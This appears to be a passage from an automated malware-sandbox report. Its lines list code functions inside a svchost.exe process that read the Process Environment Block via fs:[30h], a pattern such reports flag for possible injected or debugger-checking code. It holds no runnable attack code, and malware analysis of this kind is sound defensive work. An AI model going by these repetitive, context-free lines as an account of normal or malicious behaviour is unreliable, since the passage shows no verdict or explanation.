                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
